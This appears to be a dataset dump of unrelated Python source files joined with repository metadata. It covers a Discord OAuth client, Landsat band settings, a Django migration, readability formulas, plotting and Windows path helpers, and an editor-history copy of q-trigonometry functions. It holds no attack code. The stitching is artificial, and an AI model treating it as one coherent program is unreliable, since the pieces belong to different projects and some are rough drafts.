t = jinja_env.get_template(template)
return t.render(params)
class BlogHandler(webapp2.RequestHandler):
def write(self, *a, **kw):
self.response.out.write(*a, **kw)
def render_str(self, template, **params):
return render_str(template, **params)
def render(self, template, **kw):
self.write(self.render_str(template, **kw))
def get_user_from_cookie(self):
random = self.check_for_valid_cookie()
if random:
return User.get_by_id(int(random))
else:
return None
def check_for_valid_cookie(self):
random = self.request.cookies.get('random')
if random:
is_valid_cookie = check_secure_val(random)
if is_valid_cookie:
return self.request.cookies.get('random').split("|")[0]
return None
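# Illustrative subclass using the helpers above (the route and template names are hypothetical):
# class FrontPage(BlogHandler):
#     def get(self):
#         user = self.get_user_from_cookie()
#         self.render('front.html', user=user)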
| 2.328125 | 2 |
scripts/field/go50000.py | Snewmy/swordie | 2 | 12761621 | <gh_stars>1-10
# Inside Dangerous Forest
sm.showEffect("Map/Effect.img/maplemap/enter/50000") | 0.753906 | 1 |
fastapi_discord/client.py | HKGx/fastapi-discord | 28 | 12761622 | <filename>fastapi_discord/client.py
from typing import Dict, List, Optional, Tuple, Union
import aiohttp
from aiocache import cached
from fastapi import Depends, Request
from fastapi.security import HTTPAuthorizationCredentials, HTTPBearer
from typing_extensions import TypedDict, Literal
from .config import DISCORD_API_URL, DISCORD_OAUTH_AUTHENTICATION_URL, DISCORD_TOKEN_URL
from .exceptions import RateLimited, ScopeMissing, Unauthorized, InvalidToken
from .models import Guild, GuildPreview, User
class RefreshTokenPayload(TypedDict):
client_id: str
client_secret: str
grant_type: Literal["refresh_token"]
refresh_token: str
class TokenGrantPayload(TypedDict):
client_id: str
client_secret: str
grant_type: Literal["authorization_code"]
code: str
redirect_uri: str
class TokenResponse(TypedDict):
access_token: str
token_type: str
expires_in: int
refresh_token: str
scope: str
PAYLOAD = Union[TokenGrantPayload, RefreshTokenPayload]
def _tokens(resp: TokenResponse) -> Tuple[str, str]:
"""
Extracts tokens from TokenResponse
Parameters
----------
resp: TokenResponse
Response
Returns
-------
Tuple[str, str]
        A tuple of (access_token, refresh_token)
Raises
------
InvalidToken
If tokens are `None`
"""
access_token, refresh_token = resp.get("access_token"), resp.get("refresh_token")
if access_token is None or refresh_token is None:
raise InvalidToken("Tokens can't be None")
return access_token, refresh_token
class DiscordOAuthClient:
"""Client for Discord Oauth2.
Parameters
----------
client_id:
Discord application client ID.
client_secret:
Discord application client secret.
redirect_uri:
Discord application redirect URI.
"""
def __init__(self, client_id, client_secret, redirect_uri, scopes=("identify",)):
self.client_id = client_id
self.client_secret = client_secret
self.redirect_uri = redirect_uri
self.scopes = "%20".join(scope for scope in scopes)
self.client_session: aiohttp.ClientSession = aiohttp.ClientSession()
def get_oauth_login_url(self, state: Optional[str] = None):
"""
Returns a Discord Login URL
"""
client_id = f"client_id={self.client_id}"
redirect_uri = f"redirect_uri={self.redirect_uri}"
scopes = f"scope={self.scopes}"
response_type = "response_type=code"
state = f"&state={state}" if state else ""
return f"{DISCORD_OAUTH_AUTHENTICATION_URL}?{client_id}&{redirect_uri}&{scopes}&{response_type}{state}"
oauth_login_url = property(get_oauth_login_url)
@cached(ttl=550)
    async def request(self, route: str, token: Optional[str] = None, method: Literal["GET", "POST"] = "GET"):
headers: Dict = {}
if token:
headers = {"Authorization": f"Bearer {token}"}
if method == "GET":
async with self.client_session.get(f"{DISCORD_API_URL}{route}", headers=headers) as resp:
data = await resp.json()
elif method == "POST":
async with self.client_session.post(f"{DISCORD_API_URL}{route}", headers=headers) as resp:
data = await resp.json()
else:
raise Exception("Other HTTP than GET and POST are currently not Supported")
if resp.status == 401:
raise Unauthorized
if resp.status == 429:
raise RateLimited(data, resp.headers)
return data
async def get_token_response(self, payload: PAYLOAD) -> TokenResponse:
async with self.client_session.post(DISCORD_TOKEN_URL, data=payload) as resp:
return await resp.json()
async def get_access_token(self, code: str) -> Tuple[str, str]:
payload: TokenGrantPayload = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"grant_type": "authorization_code",
"code": code,
"redirect_uri": self.redirect_uri,
}
resp = await self.get_token_response(payload)
return _tokens(resp)
async def refresh_access_token(self, refresh_token: str) -> Tuple[str, str]:
payload: RefreshTokenPayload = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"grant_type": "refresh_token",
"refresh_token": refresh_token,
}
resp = await self.get_token_response(payload)
return _tokens(resp)
async def user(self, request: Request):
if "identify" not in self.scopes:
raise ScopeMissing("identify")
route = "/users/@me"
token = self.get_token(request)
return User(**(await self.request(route, token)))
async def guilds(self, request: Request) -> List[GuildPreview]:
if "guilds" not in self.scopes:
raise ScopeMissing("guilds")
route = "/users/@me/guilds"
token = self.get_token(request)
return [Guild(**guild) for guild in await self.request(route, token)]
def get_token(self, request: Request):
authorization_header = request.headers.get("Authorization")
if not authorization_header:
raise Unauthorized
authorization_header = authorization_header.split(" ")
if not authorization_header[0] == "Bearer" or len(authorization_header) > 2:
raise Unauthorized
token = authorization_header[1]
return token
async def isAuthenticated(self, token: str):
route = "/oauth2/@me"
try:
await self.request(route, token)
return True
except Unauthorized:
return False
async def requires_authorization(self, bearer: Optional[HTTPAuthorizationCredentials] = Depends(HTTPBearer())):
if bearer is None:
raise Unauthorized
if not await self.isAuthenticated(bearer.credentials):
raise Unauthorized
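# Illustrative wiring sketch (credentials, app object, and route path are placeholders, not part of this module):
# from fastapi import FastAPI
# app = FastAPI()
# discord = DiscordOAuthClient("CLIENT_ID", "CLIENT_SECRET", "http://localhost:8000/callback", ("identify", "guilds"))
#
# @app.get("/callback")
# async def callback(code: str):
#     access_token, refresh_token = await discord.get_access_token(code)
#     return {"access_token": access_token, "refresh_token": refresh_token}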
| 2.421875 | 2 |
tests/vcf_tools/test_parse_variant.py | Varstation/genmod | 46 | 12761623 | <filename>tests/vcf_tools/test_parse_variant.py
from genmod.vcf_tools import get_variant_id
class TestGetVariantId:
def test_get_variant_id(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'A',
'ALT': 'G'
}
assert get_variant_id(variant) == "1_10_A_G"
def test_get_variant_id_sv_ins(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'N',
'ALT': '<INS>'
}
assert get_variant_id(variant) == "1_10_N_INS"
def test_get_variant_id_sv_dup_tandem(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'N',
'ALT': '<DUP:TANDEM>'
}
assert get_variant_id(variant) == "1_10_N_DUPTANDEM"
def test_get_variant_id_sv_bdn(self):
variant = {
'CHROM': '1',
'POS': '10',
'REF': 'A',
'ALT': 'T[6:134717462['
}
assert get_variant_id(variant) == "1_10_A_T6134717462" | 2.25 | 2 |
app-tasks/rf/src/rf/uploads/landsat8/settings.py | radiantearth/raster-foundry | 0 | 12761624 | """Settings shared by functions for indexing Landsat 8 data"""
from rf.utils.io import s3
organization = 'dfac6307-b5ef-43f7-beda-b9f208bb7726'
# Band 8 is panchromatic and at 15m resolution. All other bands
# are at the 30m resolution. Bands are:
# 1: Coastal aerosol
# 2: Blue
# 3: Green
# 4: Red
# 5: Near infrared (NIR)
# 6: SWIR 1
# 7: SWIR 2
# 8: Panchromatic
# 9: Cirrus
# 10: Thermal infrared (TIRS 1) (resampled to 30m from 100m in product)
# 11: Thermal infrared (TIRS 2) (resampled to 30m from 100m in product)
#
# Source: http://landsat.usgs.gov/band_designations_landsat_satellites.php
band_lookup = {
'15m': [{
'name': 'panchromatic - 8',
'number': 0,
'wavelength': [500, 680]
}],
'30m': [{
'name': 'coastal aerosol - 1',
'number': 0,
'wavelength': [430, 450]
}, {
'name': 'blue - 2',
'number': 0,
'wavelength': [450, 510]
}, {
'name': 'green - 3',
'number': 0,
'wavelength': [530, 590]
}, {
'name': 'red - 4',
'number': 0,
'wavelength': [640, 670]
}, {
'name': 'near infrared - 5',
'number': 0,
'wavelength': [850, 880]
}, {
'name': 'swir - 6',
'number': 0,
'wavelength': [1570, 1650]
}, {
'name': 'swir - 7',
'number': 0,
'wavelength': [2110, 2290]
}, {
'name': 'cirrus - 9',
'number': 0,
'wavelength': [1360, 1380]
}, {
'name': 'thermal infrared - 10',
'number': 0,
'wavelength': [10600, 11190]
}, {
'name': 'thermal infrared - 11',
'number': 0,
'wavelength': [11500, 12510]
}]
}
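# Example lookup into the table above (a minimal sketch; 'red - 4' is one of the 30m entries):
# red_band = next(b for b in band_lookup['30m'] if b['name'] == 'red - 4')
# assert red_band['wavelength'] == [640, 670]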
datasource_id = '697a0b91-b7a8-446e-842c-97cda155554d'
usgs_landsat_url = (
'https://landsat.usgs.gov/landsat/metadata_service/bulk_metadata_files/LANDSAT_8.csv'
)
aws_landsat_base = 'http://landsat-pds.s3.amazonaws.com/'
bucket_name = 'landsat-pds'
bucket = s3.Bucket(bucket_name)
| 2.125 | 2 |
proposals/migrations/0034_auto_20211213_1503.py | UiL-OTS-labs/etcl | 2 | 12761625 | # Generated by Django 2.2.24 on 2021-12-13 14:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import main.validators
import proposals.utils.proposal_utils
import proposals.validators
class Migration(migrations.Migration):
dependencies = [
('proposals', '0033_auto_20210521_1154'),
]
operations = [
migrations.AlterField(
model_name='proposal',
name='avg_understood',
field=models.BooleanField(default=False, validators=[proposals.validators.AVGUnderstoodValidator], verbose_name='Ik heb kennis genomen van het bovenstaande en begrijp mijn verantwoordelijkheden ten opzichte van de AVG.'),
),
migrations.AlterField(
model_name='proposal',
name='date_start',
field=models.DateField(blank=True, null=True, verbose_name='Wat is de beoogde startdatum van het onderzoek waarvoor deze aanvraag wordt ingediend?'),
),
migrations.AlterField(
model_name='proposal',
name='dmp_file',
field=models.FileField(blank=True, storage=proposals.utils.proposal_utils.OverwriteStorage(), upload_to=proposals.utils.proposal_utils.FilenameFactory('DMP'), validators=[main.validators.validate_pdf_or_doc], verbose_name='Als je een Data Management Plan hebt voor deze aanvraag, kan je kiezen om deze hier bij te voegen. Het aanleveren van een DMP vergemakkelijkt het toetsingsproces aanzienlijk.'),
),
migrations.AlterField(
model_name='proposal',
name='funding_name',
field=models.CharField(blank=True, help_text='De titel die je hier opgeeft zal in de formele toestemmingsbrief gebruikt worden.', max_length=200, verbose_name='Wat is de naam van het gefinancierde project?'),
),
migrations.AlterField(
model_name='proposal',
name='has_minor_revision',
field=models.BooleanField(default=False, verbose_name='Is er een revisie geweest na het indienen van deze aanvraag?'),
),
migrations.AlterField(
model_name='proposal',
name='inform_local_staff',
field=models.BooleanField(blank=True, default=None, null=True, verbose_name='<p>Je hebt aangegeven dat je gebruik wilt gaan maken van één van de faciliteiten van het UiL OTS, namelijk de database, Zep software en/of het UiL OTS lab. Het lab supportteam van het UiL OTS zou graag op de hoogte willen worden gesteld van aankomende onderzoeken. Daarom vragen wij hier jouw toestemming om delen van deze aanvraag door te sturen naar het lab supportteam.</p> <p>Vind je het goed dat de volgende delen uit de aanvraag worden doorgestuurd:</p> - Jouw naam en de namen van de andere betrokkenen <br/> - De eindverantwoordelijke van het onderzoek <br/> - De titel van het onderzoek <br/> - De beoogde startdatum <br/> - Van welke faciliteiten je gebruik wil maken (database, lab, Zep software)'),
),
migrations.AlterField(
model_name='proposal',
name='institution',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='proposals.Institution', verbose_name='Aan welk onderzoeksinstituut ben je verbonden?'),
),
migrations.AlterField(
model_name='proposal',
name='is_pre_approved',
field=models.BooleanField(blank=True, default=None, null=True, verbose_name='Heb je formele toestemming van een ethische toetsingcommissie, uitgezonderd deze FETC-GW commissie?'),
),
migrations.AlterField(
model_name='proposal',
name='is_revision',
field=models.BooleanField(default=False, verbose_name='Is deze aanvraag een revisie van of amendement op een ingediende aanvraag?'),
),
migrations.AlterField(
model_name='proposal',
name='other_applicants',
field=models.BooleanField(default=False, verbose_name='Zijn er nog andere onderzoekers bij deze aanvraag betrokken die geaffilieerd zijn aan één van de onderzoeksinstituten ICON, OFR, OGK of UiL OTS?'),
),
migrations.AlterField(
model_name='proposal',
name='other_stakeholders',
field=models.BooleanField(default=False, verbose_name='Zijn er nog andere onderzoekers bij deze aanvraag betrokken die <strong>niet</strong> geaffilieerd zijn aan een van de onderzoeksinstituten van de Faculteit Geestwetenschappen van de UU? '),
),
migrations.AlterField(
model_name='proposal',
name='parent',
field=models.ForeignKey(help_text='Dit veld toont enkel aanvragen waar je zelf een medeuitvoerende bent.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to='proposals.Proposal', verbose_name='Te kopiëren aanvraag'),
),
migrations.AlterField(
model_name='proposal',
name='pre_approval_institute',
field=models.CharField(blank=True, max_length=200, null=True, verbose_name='Welk instituut heeft de aanvraag goedgekeurd?'),
),
migrations.AlterField(
model_name='proposal',
name='pre_approval_pdf',
field=models.FileField(blank=True, upload_to=proposals.utils.proposal_utils.FilenameFactory('Pre_Approval'), validators=[main.validators.validate_pdf_or_doc], verbose_name='Upload hier je formele toestemmingsbrief van dit instituut (in .pdf of .doc(x)-formaat)'),
),
migrations.AlterField(
model_name='proposal',
name='pre_assessment_pdf',
field=models.FileField(blank=True, upload_to=proposals.utils.proposal_utils.FilenameFactory('Preassessment'), validators=[main.validators.validate_pdf_or_doc], verbose_name='Upload hier je aanvraag (in .pdf of .doc(x)-formaat)'),
),
migrations.AlterField(
model_name='proposal',
name='relation',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='proposals.Relation', verbose_name='In welke hoedanigheid ben je betrokken bij dit onderzoek?'),
),
migrations.AlterField(
model_name='proposal',
name='reviewing_committee',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='auth.Group', verbose_name='Door welke comissie dient deze aanvraag te worden beoordeeld?'),
),
migrations.AlterField(
model_name='proposal',
name='status',
field=models.PositiveIntegerField(choices=[(1, 'Concept'), (40, 'Opgestuurd ter beoordeling door eindverantwoordelijke'), (50, 'Opgestuurd ter beoordeling door FETC-GW'), (55, 'Aanvraag is beoordeeld door FETC-GW'), (60, 'Aanvraag is beoordeeld door FETC-GW')], default=1),
),
migrations.AlterField(
model_name='proposal',
name='supervisor',
field=models.ForeignKey(blank=True, help_text='Aan het einde van de procedure kan je deze aanvraag ter\n verificatie naar je eindverantwoordelijke sturen. De\n eindverantwoordelijke zal de aanvraag vervolgens kunnen aanpassen en\n indienen bij de FETC-GW. <br><br><strong>Tip</strong>: Type een\n aantal letters van de voornaam, achternaam, of Solis ID van het\n persoon die je toe wilt voegen in de zoekbalk hiernaast.\n Merk op dat het laden even kan duren.', null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Eindverantwoordelijke onderzoeker'),
),
migrations.AlterField(
model_name='proposal',
name='title',
field=models.CharField(help_text='De titel die je hier opgeeft is zichtbaar voor de FETC-GW-leden en, wanneer de aanvraag is goedgekeurd, ook voor alle medewerkers die in het archief van deze portal kijken. De titel mag niet identiek zijn aan een vorige titel van een aanvraag die je hebt ingediend.', max_length=200, verbose_name='Wat is de titel van je aanvraag? Deze titel zal worden gebruikt in alle formele correspondentie.'),
),
migrations.AlterField(
model_name='wmo',
name='metc_application',
field=models.BooleanField(default=False, verbose_name='Je onderzoek moet beoordeeld worden door een METC, maar dient nog wel bij de FETC-GW te worden geregistreerd. Is dit onderzoek al aangemeld bij een METC?'),
),
]
| 1.640625 | 2 |
ttt_package/libs/plot_results.py | Ipgnosis/tic_tac_toe | 0 | 12761626 | <filename>ttt_package/libs/plot_results.py
# plot the results of a multi-game run
# written by Russell on 5/4/20
# modified on 6/28 to integrate agent modes into legend
import matplotlib.pyplot as plt
# simple matplotlib graph of the results
def results_plot(plot_title, x_mode, o_mode, results):
agentX_x_axis = results[0]
agentX_y_axis = results[1]
agentO_x_axis = results[2]
agentO_y_axis = results[3]
draw_x_axis = results[4]
draw_y_axis = results[5]
x_label = "Cross wins; mode: {}".format(x_mode)
o_label = "Nought wins; mode: {}".format(o_mode)
plt.subplot(1, 1, 1)
plt.plot(agentX_x_axis, agentX_y_axis, label=x_label)
plt.plot(agentO_x_axis, agentO_y_axis, label=o_label)
plt.plot(draw_x_axis, draw_y_axis, label='Drawn games')
plt.title(plot_title)
plt.xlabel("Games")
plt.ylabel("Score")
plt.legend()
plt.show()
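# Illustrative call (the six parallel lists mirror the indexing in results_plot; the values are made up):
# results = [[1, 2, 3], [0, 1, 1],   # cross: games played, cumulative wins
#            [1, 2, 3], [1, 1, 2],   # nought: games played, cumulative wins
#            [1, 2, 3], [0, 0, 0]]   # draws: games played, cumulative draws
# results_plot("100-game run", "learning", "random", results)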
| 2.8125 | 3 |
icekit/utils/readability/readability.py | ic-labs/django-icekit | 52 | 12761627 | <filename>icekit/utils/readability/readability.py
#!/usr/bin/env python
import math
from .readability_utils import get_char_count
from .readability_utils import get_words
from .readability_utils import get_sentences
from .readability_utils import count_syllables
from .readability_utils import count_complex_words
class Readability:
analyzedVars = {}
def __init__(self, text):
self.analyze_text(text)
def analyze_text(self, text):
words = get_words(text)
char_count = get_char_count(words)
word_count = len(words)
sentence_count = len(get_sentences(text))
syllable_count = count_syllables(words)
complexwords_count = count_complex_words(text)
avg_words_p_sentence = word_count/sentence_count
self.analyzedVars = {
'words': words,
'char_cnt': float(char_count),
'word_cnt': float(word_count),
'sentence_cnt': float(sentence_count),
'syllable_cnt': float(syllable_count),
'complex_word_cnt': float(complexwords_count),
'avg_words_p_sentence': float(avg_words_p_sentence)
}
def ARI(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 4.71 * (self.analyzedVars['char_cnt'] / self.analyzedVars['word_cnt']) + 0.5 * (self.analyzedVars['word_cnt'] / self.analyzedVars['sentence_cnt']) - 21.43
return score
def FleschReadingEase(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 206.835 - (1.015 * (self.analyzedVars['avg_words_p_sentence'])) - (84.6 * (self.analyzedVars['syllable_cnt']/ self.analyzedVars['word_cnt']))
return round(score, 4)
def FleschKincaidGradeLevel(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 0.39 * (self.analyzedVars['avg_words_p_sentence']) + 11.8 * (self.analyzedVars['syllable_cnt']/ self.analyzedVars['word_cnt']) - 15.59
return round(score, 4)
def GunningFogIndex(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = 0.4 * ((self.analyzedVars['avg_words_p_sentence']) + (100 * (self.analyzedVars['complex_word_cnt']/self.analyzedVars['word_cnt'])))
return round(score, 4)
def SMOGIndex(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = (math.sqrt(self.analyzedVars['complex_word_cnt']*(30/self.analyzedVars['sentence_cnt'])) + 3)
return score
def ColemanLiauIndex(self):
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
score = (5.89*(self.analyzedVars['char_cnt']/self.analyzedVars['word_cnt']))-(30*(self.analyzedVars['sentence_cnt']/self.analyzedVars['word_cnt']))-15.8
return round(score, 4)
def LIX(self):
longwords = 0.0
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
for word in self.analyzedVars['words']:
if len(word) >= 7:
longwords += 1.0
score = self.analyzedVars['word_cnt'] / self.analyzedVars['sentence_cnt'] + float(100 * longwords) / self.analyzedVars['word_cnt']
return score
def RIX(self):
longwords = 0.0
score = 0.0
if self.analyzedVars['word_cnt'] > 0.0:
for word in self.analyzedVars['words']:
if len(word) >= 7:
longwords += 1.0
score = longwords / self.analyzedVars['sentence_cnt']
return score
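# Python 3 usage sketch (the sample text is illustrative; mirrors the commented-out demo below):
# rd = Readability("The quick brown fox jumps over the lazy dog. It was not amused.")
# print(rd.FleschKincaidGradeLevel(), rd.GunningFogIndex(), rd.ARI())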
# commenting for quick py3 compatibility
# if __name__ == "__main__":
# text = """We are close to wrapping up our 10 week Rails Course. This week we will cover a handful of topics commonly encountered in Rails projects. We then wrap up with part 2 of our Reddit on Rails exercise! By now you should be hard at work on your personal projects. The students in the course just presented in front of the class with some live demos and a brief intro to to the problems their app were solving. Maybe set aside some time this week to show someone your progress, block off 5 minutes and describe what goal you are working towards, the current state of the project (is it almost done, just getting started, needs UI, etc.), and then show them a quick demo of the app. Explain what type of feedback you are looking for (conceptual, design, usability, etc.) and see what they have to say. As we are wrapping up the course you need to be focused on learning as much as you can, but also making sure you have the tools to succeed after the class is over."""
#
# rd = Readability(text)
# print 'Test text:'
# print '"%s"\n' % text
# print 'ARI: ', rd.ARI()
# # print 'FleschReadingEase: ', rd.FleschReadingEase()
# # print 'FleschKincaidGradeLevel: ', rd.FleschKincaidGradeLevel()
# print 'GunningFogIndex: ', rd.GunningFogIndex()
# print 'SMOGIndex: ', rd.SMOGIndex()
# # print 'ColemanLiauIndex: ', rd.ColemanLiauIndex()
# # print 'LIX: ', rd.LIX()
# # print 'RIX: ', rd.RIX()
#
| 2.96875 | 3 |
task/admin.py | suvajitsarkar/taskManagement | 0 | 12761628 | from django.contrib import admin
# Register your models here.
from .models import Tasks, Audit
admin.site.register(Tasks)
admin.site.register(Audit)
| 1.257813 | 1 |
agdc-v2/datacube/ui/click.py | ceos-seo/Data_Cube_v2 | 27 | 12761629 | # coding=utf-8
"""
Common functions for click-based cli scripts.
"""
from __future__ import absolute_import
import functools
import logging
import os
import re
import copy
import click
from datacube import config, __version__
from datacube.executor import get_executor
from datacube.index import index_connect
from pathlib import Path
from sqlalchemy.exc import OperationalError, ProgrammingError
_LOG_FORMAT_STRING = '%(asctime)s %(levelname)s %(message)s'
CLICK_SETTINGS = dict(help_option_names=['-h', '--help'])
def _print_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
click.echo(
'{prog}, version {version}'.format(
prog='Data Cube',
version=__version__
)
)
ctx.exit()
def compose(*functions):
"""
>>> compose(
... lambda x: x+1,
... lambda y: y+2
... )(1)
4
"""
def compose2(f, g):
return lambda x: f(g(x))
return functools.reduce(compose2, functions, lambda x: x)
class ColorFormatter(logging.Formatter):
colors = {
'info': dict(fg='white'),
'error': dict(fg='red'),
'exception': dict(fg='red'),
'critical': dict(fg='red'),
'debug': dict(fg='blue'),
'warning': dict(fg='yellow')
}
def format(self, record):
if not record.exc_info:
record = copy.copy(record)
record.levelname = click.style(record.levelname, **self.colors.get(record.levelname.lower(), {}))
return logging.Formatter.format(self, record)
class ClickHandler(logging.Handler):
def emit(self, record):
try:
msg = self.format(record)
click.echo(msg, err=True)
except (KeyboardInterrupt, SystemExit):
raise
except: # pylint: disable=bare-except
self.handleError(record)
def _init_logging(ctx, param, value):
handler = ClickHandler()
handler.formatter = ColorFormatter(_LOG_FORMAT_STRING)
logging.root.addHandler(handler)
logging_level = logging.WARN - 10 * value
logging.root.setLevel(logging_level)
logging.getLogger('datacube').setLevel(logging_level)
if not ctx.obj:
ctx.obj = {}
ctx.obj['verbosity'] = value
def _add_logfile(ctx, param, value):
formatter = logging.Formatter(_LOG_FORMAT_STRING)
for logfile in value:
handler = logging.FileHandler(logfile)
handler.formatter = formatter
logging.root.addHandler(handler)
def _log_queries(ctx, param, value):
if value:
logging.getLogger('sqlalchemy.engine').setLevel('INFO')
def _set_config(ctx, param, value):
if value:
if not any(os.path.exists(p) for p in value):
            raise ValueError('No specified config paths exist: {}'.format(value))
paths = value
else:
paths = config.DEFAULT_CONF_PATHS
parsed_config = config.LocalConfig.find(paths=paths)
if not ctx.obj:
ctx.obj = {}
ctx.obj['config_file'] = parsed_config
#: pylint: disable=invalid-name
version_option = click.option('--version', is_flag=True, callback=_print_version,
expose_value=False, is_eager=True)
#: pylint: disable=invalid-name
verbose_option = click.option('--verbose', '-v', count=True, callback=_init_logging,
is_eager=True, expose_value=False, help="Use multiple times for more verbosity")
#: pylint: disable=invalid-name
logfile_option = click.option('--log-file', multiple=True, callback=_add_logfile,
is_eager=True, expose_value=False, help="Specify log file")
#: pylint: disable=invalid-name
config_option = click.option('--config_file', '-C', multiple=True, default='', callback=_set_config,
expose_value=False)
#: pylint: disable=invalid-name
log_queries_option = click.option('--log-queries', is_flag=True, callback=_log_queries,
expose_value=False, help="Print database queries.")
# This is a function, so it's valid to be lowercase.
#: pylint: disable=invalid-name
global_cli_options = compose(
version_option,
verbose_option,
logfile_option,
config_option,
log_queries_option
)
@click.group(help="Data Cube command-line interface", context_settings=CLICK_SETTINGS)
@global_cli_options
def cli():
pass
def pass_config(f):
"""Get a datacube config as the first argument. """
def new_func(*args, **kwargs):
config_ = click.get_current_context().obj['config_file']
return f(config_, *args, **kwargs)
return functools.update_wrapper(new_func, f)
def pass_index(app_name=None, expect_initialised=True):
"""Get a connection to the index as the first argument.
    A short name of the application can be specified for logging purposes.
"""
def decorate(f):
def with_index(*args, **kwargs):
ctx = click.get_current_context()
try:
index = index_connect(ctx.obj['config_file'],
application_name=app_name or ctx.command_path,
validate_connection=expect_initialised)
return f(index, *args, **kwargs)
except (OperationalError, ProgrammingError) as e:
handle_exception('Error Connecting to database: %s', e)
return functools.update_wrapper(with_index, f)
return decorate
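# Usage sketch (hypothetical subcommand, not part of this module): stacking the
# decorators on a click command so it receives an index connection first.
#
# @cli.command()
# @pass_index(app_name='my-app')
# def check(index):
#     click.echo(index)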
def parse_endpoint(value):
ip, port = tuple(value.split(':'))
return ip, int(port)
EXECUTOR_TYPES = {
'serial': lambda _: get_executor(None, None),
'multiproc': lambda workers: get_executor(None, int(workers)),
'distributed': lambda addr: get_executor(parse_endpoint(addr), True)
}
def _setup_executor(ctx, param, value):
try:
return EXECUTOR_TYPES[value[0]](value[1])
except ValueError:
ctx.fail("Failed to create '%s' executor with '%s'" % value)
executor_cli_options = click.option('--executor',
type=(click.Choice(EXECUTOR_TYPES.keys()), str),
default=('serial', None),
help="Run parallelized, either locally or distrbuted. eg:\n"
"--executor multiproc 4 (OR)\n"
"--executor distributed 10.0.0.8:8888",
callback=_setup_executor)
def handle_exception(msg, e):
"""
Exit following an exception in a CLI app
If verbosity (-v flag) specified, dump out a stack trace. Otherwise,
simply print the given error message.
Include a '%s' in the message to print the single line message from the
exception.
:param e: caught Exception
:param msg: Message to User with optional %s
"""
ctx = click.get_current_context()
if ctx.obj['verbosity'] >= 1:
raise e
else:
if '%s' in msg:
click.echo(msg % e)
else:
click.echo(msg)
ctx.exit(1)
def to_pathlib(ctx, param, value):
if value:
return Path(value)
else:
return None
| 2.078125 | 2 |
siptracklib/win32utils.py | sii/siptrack | 8 | 12761630 | <filename>siptracklib/win32utils.py
import os
try:
import ctypes
has_ctypes = True
except ImportError:
has_ctypes = False
MAX_PATH = 260
CSIDL_APPDATA = 0x001A
CSIDL_LOCAL_APPDATA = 0x001c
CSIDL_PERSONAL = 0x0005
def get_appdata_dir():
dir = None
if has_ctypes:
SHGetSpecialFolderPath = ctypes.windll.shell32.SHGetSpecialFolderPathW
buf = ctypes.create_unicode_buffer(MAX_PATH)
SHGetSpecialFolderPath(None, buf, CSIDL_APPDATA, 0)
dir = buf.value
return dir
def get_program_files_dir():
return os.environ['ProgramFiles']
| 2.078125 | 2 |
legacy/legacy_scripts/legacy/download_CDS.py | tomkimpson/ML4L | 1 | 12761631 | <gh_stars>1-10
import climetlab as cml
import xarray as xr
from config import *
#Load the data
if load_x_data_from_remote:
xdata = cml.load_source("cds",
"reanalysis-era5-land-monthly-means",
variable=list(xvariables.values()),
product_type= "monthly_averaged_reanalysis",
year = years,
month = months,
time = times
)
print ('DATA loaded from cache')
print (xdata)
print('--------')
print ('Now trying to load into cube')
# print(xdata.to_xarray(xarray_open_mfdataset_kwargs = {'filter_by_keys':{'typeOfLevel': 'newsurface'}},backend_kwargs={'errors': 'ignore', 'filter_by_keys': {'typeOfLevel': 'notsurface'}}))
print(xdata.to_xarray(backend_kwargs={'errors': 'ignore', 'filter_by_keys': {'typeOfLevel': 'notsurface'}}))
# data = xdata.to_xarray(engine='cfgrib', backend_kwargs={'filter_by_keys':{'typeOfLevel':'surface', 'edition': 1}})
print('--------')
cds_xarray = xdata.to_xarray(backend_kwargs={'errors': 'ignore','filter_by_keys':{'edition': 1, 'typeOfLevel':'surface'}})
cds_xarray.to_netcdf(data_root+xdata)
else:
cds_xarray = xr.open_dataset(data_root+xdata)
| 1.945313 | 2 |
.history/qfunction/base/trigonometry_20210710213753.py | gpftc/qfunction | 0 | 12761632 | <filename>.history/qfunction/base/trigonometry_20210710213753.py<gh_stars>0
from qfunction.base.base import *
from numpy import sin, cos
import numpy as np
from math import atan
def q_sin(u, q, cpx=False, israd=True):
    u = radian(u) if not israd else u
    b = 1j
    u = u * 1j
    if cpx:
        return (q_exp(u, q) - q_exp(-u, q)) / (2 * b)
    else:
        return ((q_exp(u, q) - q_exp(-u, q)) / (2 * b)).real
def q_cos(u, q=1, cpx=False, israd=True):
    u = radian(u) if not israd else u
    A = lambda w: 1 / (1 - w)
    # compare on the real argument before moving to the imaginary axis:
    # complex numbers cannot be ordered, so comparing after multiplying
    # by 1j would raise a TypeError whenever q > 1.9
    if q > 1.9 and u >= limit(A, q):
        return np.nan
    u = u * 1j
    if cpx:
        return (q_exp(u, q) + q_exp(-u, q)) / 2
    else:
        return ((q_exp(u, q) + q_exp(-u, q)) / 2).real
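# Sanity-check sketch (commented; assumes q_exp from qfunction.base is finite
# for the chosen q — as q approaches 1 the q-exponential reduces to exp, so
# these should approach the ordinary sin/cos):
#
# print(q_sin(np.pi / 2, q=1.001))  # close to sin(pi/2) = 1.0
# print(q_cos(0.0, q=1.001))        # close to cos(0) = 1.0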
| 2.3125 | 2 |
Python Basics/2. If - Else/01. Excellent Result.py | a-shiro/SoftUni-Courses | 0 | 12761633 | <gh_stars>0
grade = float(input())
if grade >= 5.50:
    print("Excellent!") | 3.203125 | 3 |
fmridenoise/interfaces/__init__.py | wiheto/fmridenoise | 0 | 12761634 | <gh_stars>0
from .quality_measures import (QualityMeasures,
PipelinesQualityMeasures,
